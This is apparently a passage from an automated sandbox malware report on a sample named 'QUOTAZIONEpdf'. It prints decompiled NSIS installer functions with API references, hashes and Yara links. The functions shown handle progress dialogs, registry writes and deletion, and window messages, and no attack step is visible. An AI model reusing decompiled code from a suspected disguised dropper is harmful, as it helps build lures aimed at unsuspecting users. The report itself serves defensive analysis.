                • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404E23, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                0x00404e29
                0x00404e35
                0x00404e38
                0x00404e3e
                0x00404e4a
                0x00404e4d
                0x00404e50
                0x00404e56
                0x00404e56
                0x00404e5c
                0x00404e64
                0x00404e67
                0x00404e84
                0x00404e88
                0x00404e91
                0x00404e91
                0x00404e9b
                0x00404ea4
                0x00404eb0
                0x00404eb7
                0x00404ebb
                0x00404ebe
                0x00404ed1
                0x00404edf
                0x00404edf
                0x00404ee3
                0x00404ee5
                0x00404ee8
                0x00000000
                0x00404ee8
                0x00404e69
                0x00404e71
                0x00404e79
                0x00404e7f
                0x00000000
                0x00404e7f
                0x00404e79
                0x00404e67
                0x00404ef2

                APIs
                • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                • String ID:
                • API String ID: 2531174081-0
                • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004046F2, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                0x00404700
                0x0040470d
                0x00404713
                0x00404751
                0x00404751
                0x00404760
                0x00404767
                0x00000000
                0x00404769
                0x00404715
                0x00404724
                0x0040472c
                0x0040472f
                0x00404741
                0x00404747
                0x0040474e
                0x00000000
                0x0040474e
                0x00000000

                APIs
                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                • GetMessagePos.USER32 ref: 00404715
                • ScreenToClient.USER32 ref: 0040472F
                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Message$Send$ClientScreen
                • String ID: f
                • API String ID: 41195575-1993550816
                • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402B2D, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                0x00402b3a
                0x00402b48
                0x00402b4e
                0x00402b4e
                0x00402b5c
                0x00402b5e
                0x00402b6a
                0x00402b6f
                0x00402b71
                0x00402b71
                0x00402b7c
                0x00402b8c
                0x00402b9e
                0x00402b9e
                0x00402ba6

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Text$ItemTimerWindowwsprintf
                • String ID: unpacking data: %d%%$verifying installer: %d%%
                • API String ID: 1451636040-1158693248
                • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004022F5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}










                0x004022f6
                0x004022fb
                0x00402305
                0x0040230f
                0x00402312
                0x00402322
                0x0040232c
                0x00402333
                0x0040233b
                0x00402349
                0x0040234d
                0x00402358
                0x00402358
                0x0040235c
                0x00402360
                0x00402366
                0x0040236b
                0x0040236b
                0x0040236f
                0x0040237b
                0x0040237b
                0x00402394
                0x00402396
                0x00402396
                0x00402399
                0x0040246f
                0x0040246f
                0x00402880
                0x0040288c

                APIs
                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CloseCreateValuelstrlen
                • String ID: C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp
                • API String ID: 1356686001-891782240
                • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402BC5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}







                0x00402bd1
                0x00402bd3
                0x00402bda
                0x00402bdd
                0x00402bdd
                0x00402be3
                0x00000000
                0x00402be3
                0x00402beb
                0x00402bf1
                0x00000000
                0x00402bf4
                0x00402bfb
                0x00402c01
                0x00402c07
                0x00402c09
                0x00402c0f
                0x00402c4d
                0x00402c53
                0x00000000
                0x00402c53
                0x00402c11
                0x00402c18
                0x00402c29
                0x00000000
                0x00402c37
                0x00402c18
                0x00402c5a

                APIs
                • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                • GetTickCount.KERNEL32 ref: 00402BFB
                • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                  • Part of subcall function 00402BA9: MulDiv.KERNEL32(0003114D,00000064,00031E57), ref: 00402BBE
                • wsprintfA.USER32 ref: 00402C29
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                  • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                  • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                • String ID: ... %d%%
                • API String ID: 632923820-2449383134
                • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00402A28, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                Download Yara Rule
                C-Code - Quality: 84%
                			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A28(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                0x00402a49
                0x00402a51
                0x00402a79
                0x00402a63
                0x00402ab3
                0x00402ab9
                0x00000000
                0x00402abb
                0x00402a77
                0x00000000
                0x00000000
                0x00402a77
                0x00402a8e
                0x00402a96
                0x00402a9d
                0x00402ac9
                0x00000000
                0x00000000
                0x00402ad1
                0x00402ad9
                0x00000000
                0x00000000
                0x00000000
                0x00402ad9
                0x00000000
                0x00402aac
                0x00402ac0

                APIs
                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: Close$DeleteEnumOpen
                • String ID:
                • API String ID: 1912718029-0
                • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                0x00401ccb
                0x00401cd2
                0x00401d01
                0x00401d09
                0x00401d10
                0x00401d10
                0x00402880
                0x0040288c

                APIs
                • GetDlgItem.USER32 ref: 00401CC5
                • GetClientRect.USER32 ref: 00401CD2
                • LoadImageA.USER32 ref: 00401CF3
                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                • DeleteObject.GDI32(00000000), ref: 00401D10
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                • String ID:
                • API String ID: 1849352358-0
                • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404610, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                Download Yara Rule
                C-Code - Quality: 51%
                			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}













                0x00404618
                0x0040461c
                0x00404624
                0x00404627
                0x00404628
                0x0040462a
                0x0040462c
                0x0040462f
                0x0040462f
                0x00404636
                0x0040463c
                0x0040463c
                0x00404643
                0x0040464e
                0x0040464f
                0x00404652
                0x00404652
                0x0040465f
                0x0040466a
                0x0040466d
                0x0040467f
                0x00404686
                0x00404687
                0x00404696
                0x004046a6
                0x004046c2

                APIs
                • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                • wsprintfA.USER32 ref: 004046A6
                • SetDlgItemTextA.USER32 ref: 004046B9
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: ItemTextlstrlenwsprintf
                • String ID: %u.%u%s%s
                • API String ID: 3540041739-3551169577
                • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                Download Yara Rule
                C-Code - Quality: 51%
                			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                0x00401bb6
                0x00401bc2
                0x00401bc5
                0x00401bce
                0x00401bce
                0x00401bd1
                0x00401bd5
                0x00401bde
                0x00401bde
                0x00401be1
                0x00401be5
                0x00401be7
                0x00401c34
                0x00401c36
                0x00401c3f
                0x00401c47
                0x00401c4a
                0x00401c4a
                0x00401c53
                0x00000000
                0x00401be9
                0x00401bf0
                0x00401bf2
                0x00401bfa
                0x00401bfd
                0x00401c25
                0x00401c59
                0x00401c59
                0x00401bff
                0x00401c0d
                0x00401c15
                0x00401c18
                0x00401c18
                0x00401bfd
                0x00401c5c
                0x00401c5f
                0x00401c65
                0x00402825
                0x00402825
                0x00402880
                0x0040288c

                APIs
                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                Strings
                Memory Dump Source
